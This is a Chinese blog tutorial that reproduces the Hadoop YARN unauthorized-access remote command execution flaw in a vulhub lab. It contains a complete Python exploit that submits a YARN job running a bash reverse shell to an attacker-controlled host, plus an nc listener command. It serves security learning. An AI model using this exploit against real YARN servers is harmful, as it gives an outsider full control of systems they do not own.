-
数据库安全:Hadoop 未授权访问-命令执行漏洞.
数据库安全:Hadoop 未授权访问-命令执行漏洞.
Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完全控制服务器。
目录:
Hadoop 未授权访问-命令执行漏洞:
开启 vulhub 靶场环境:
第一步:切换到 vulhub 目录下
cd vulhub
第二步:切换到 hadoop 目录下
cd hadoop
第三步:切换到 unauthorized-yarn 漏洞目录下.
第四步:开启 漏洞 服务.
docker-compose up -d
第五步:访问 http:// (靶场 IP 地址):8088
Hadoop 未授权访问-命令执行漏洞测试:
第一步:访问 /cluster/apps 页面【如果 该页面存在的话,说明存在未授权访问漏洞】
http://192.168.0.106:8088/cluster/apps
第二步:在 攻击机(kali)设置监听.
- nc -nvlp 8888
- // 设置 监听 端口为8888
第三步:编写 Python 执行代码.
- import requests
- def shell(url,vps_ip,port):
- headers = {
- 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
- }
- response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)
- id = response.json()["application-id"]
- data = {
- 'application-id': id,
- 'application-name': 'getshell',
- 'am-container-spec': {
- 'commands': {
- 'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)
- },
- },
- 'application-type': 'YARN'}
- exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)
- print("[+] 执行完成!")
- if __name__ == '__main__':
- url = input("目标的URL:")
- vps_ip = input("监听的主机IP地址(kali):")
- port = input("监听的主机端口(kali):")
- shell(url,vps_ip,port)
执行代码:
第四步:返回 监听的主机查看结果,发现已经成功.
参考文章:Hadoop 漏洞复现_hadoop命令执行漏洞-CSDN博客
学习链接:第55天:服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili
-
相关阅读:
Vue中对路由的进阶学习
【二分法】 超清晰思路总结+模板套路化二分法 ,看不懂你打我。
简单的谈谈VPN是什么、类型、使用场景以及工作原理?
7-13 计算圆周率
【ArcGIS Pro二次开发】(71):添加图层名称和路径到字段
含文档+PPT+源码等]精品基于Uniapp+SSM实现的定制旅游APP[包运行成功]SSM毕业设计安卓项目源码
Apache Maven
git合并错分支还原技巧
C++学习:list
成集云 | 人货客数据分析系统集成ERP | 解决方案
- 原文地址:https://blog.csdn.net/weixin_54977781/article/details/134316089